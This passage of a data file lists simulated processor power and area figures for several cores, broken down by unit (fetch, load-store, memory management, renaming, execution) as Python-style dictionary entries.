'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0005087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00223643,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00494203,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0340427,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.16541,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0927748,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.115624,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.48901,
'Instruction Fetch Unit/Runtime Dynamic': 0.24962,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0347599,
'L2/Runtime Dynamic': 0.005254,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.46485,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.596012,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0397198,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0397199,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.65241,
'Load Store Unit/Runtime Dynamic': 0.831617,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0979424,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.195885,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0347601,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.035259,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.134637,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0152779,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.350458,
'Memory Management Unit/Runtime Dynamic': 0.0505369,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.5182,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.11274,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00652249,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0561316,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.175394,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.6672,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0129848,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.212888,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0756835,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.145113,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.234063,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.118147,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.497323,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.154364,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.25505,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0142982,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00608671,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0486495,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0450149,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0629478,
'Execution Unit/Register Files/Runtime Dynamic': 0.0511016,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.105738,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.273693,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.44038,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00167226,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00167226,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00150697,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00061096,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000646643,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00549813,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0142314,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.043274,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.7526,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.147256,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.146978,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.1047,
'Instruction Fetch Unit/Runtime Dynamic': 0.357238,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.03448,
'L2/Runtime Dynamic': 0.00717489,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.64138,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.685599,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0454312,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0454311,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.85592,
'Load Store Unit/Runtime Dynamic': 0.955081,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.112026,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.224051,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0397583,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0401783,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.171147,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0244302,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.395553,
'Memory Management Unit/Runtime Dynamic': 0.0646085,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.2352,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0376123,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00700485,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.073184,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.117801,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.94229,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.009838,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.210416,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0542996,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.133289,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.21499,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.10852,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.456799,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.144119,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.19982,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0102584,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00559074,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0440635,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0413469,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0543219,
'Execution Unit/Register Files/Runtime Dynamic': 0.0469377,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0952896,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.264781,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.38431,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00112819,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00112819,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00103266,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00042711,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
